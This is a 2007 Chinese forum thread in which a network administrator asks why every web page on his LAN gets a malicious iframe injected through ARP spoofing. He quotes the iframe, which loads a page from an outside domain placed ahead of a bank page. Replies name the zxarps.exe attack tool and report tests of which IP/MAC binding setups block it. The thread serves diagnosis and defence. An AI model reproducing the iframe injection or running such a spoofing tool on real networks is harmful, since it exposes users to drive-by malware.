查看: 2433|回复: 10

网页所谓arp挂马的问题

[复制链接]
发表于 2007-12-14 15:10:54 | 显示全部楼层 |阅读模式
现在arp欺骗不仅用来窃听数据,还主动攻击。
现在访问任意网页,都被插入一段代码
打开网页源文件
<iframe src='http://www.ghghjh.cn/www1.htm' width=100 height=100></iframe>                                                                                                                                                                    
       
  


<html>  
<head>
<meta content="text/html; charset=gb2312" http-equiv="Content-Type">
<title>中国农业银行</title>
<link href="../../../../wwwroot/css/cn/hq/main.css" type="text/css" rel="stylesheet">

………………
我已绑定网关ip,mac地址
发现有伪装网关的mac地址
不知他是怎么插入代码的,科来工程包太大,传不上来

[ 本帖最后由 fg0000 于 2007-12-14 16:03 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?CSNA会员注册

×
回复

使用道具 举报

发表于 2007-12-14 17:19:18 | 显示全部楼层

是做的双向绑定么?

是做的双向绑定么?
回复

使用道具 举报

 楼主| 发表于 2007-12-14 21:22:24 | 显示全部楼层
是做的双向绑定。。。
回复

使用道具 举报

发表于 2007-12-15 01:04:28 | 显示全部楼层
应该使用的是zxarps.exe这类的arp攻击程序,只要攻击开始,该广播域内的计算机上网都会被插入一段代码,该代码可以自定义,曾经模拟测试过 ,其实就是挂马
回复

使用道具 举报

发表于 2007-12-15 21:36:27 | 显示全部楼层
这种arp欺骗需要winpcap支持?

局域网内一般都不会让人安装这个东东的...据说可以免疫``
回复

使用道具 举报

发表于 2007-12-17 23:12:28 | 显示全部楼层
原帖由 xuhl196 于 2007-12-14 17:19 发表
是做的双向绑定么?

双向绑定??有什么好处,,,,
回复

使用道具 举报

发表于 2007-12-18 01:20:44 | 显示全部楼层
双向绑定可以用来防范ARP攻击
回复

使用道具 举报

 楼主| 发表于 2007-12-18 22:33:40 | 显示全部楼层
用科来分析下,确实是中毒的机子发来的数据包,不明白的是我用arp -s 网关mac地址 ip 地址已经绑定正确的网关,又安了arp防火墙,arp 缓存里面没有表项,还是中招
回复

使用道具 举报

 楼主| 发表于 2007-12-18 22:44:25 | 显示全部楼层
研究报告zxarps.exe

.原理: 依然是arp欺骗,需要winpcap支持
主要功能:欺骗客户机并对客户机浏览网页插入代码!

结果:

1,客户机绑定网关,网关不做处理,欺骗有效,插入代码有效。

2,网关绑定客户机,客户机不做处理,插入代码无效,但客户机被欺骗成功,zxarps关闭时掉线。

3,双绑,欺骗无效,插入代码无效。

总结双绑依然是对付arp最有效的。

我属于第一种情况,上交换机上看了下,就是中毒机子的ip mac没绑定,不知怎么搞得。
回复

使用道具 举报

发表于 2007-12-18 22:56:33 | 显示全部楼层
软件都找到了,这下你可以去折磨别人了,哈哈
回复

使用道具 举报

发表于 2007-12-19 10:45:26 | 显示全部楼层
不管理措施如何完善(自认完善),还是有人天天中毒。。。(机关)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | CSNA会员注册

本版积分规则

快速回复 返回顶部 返回列表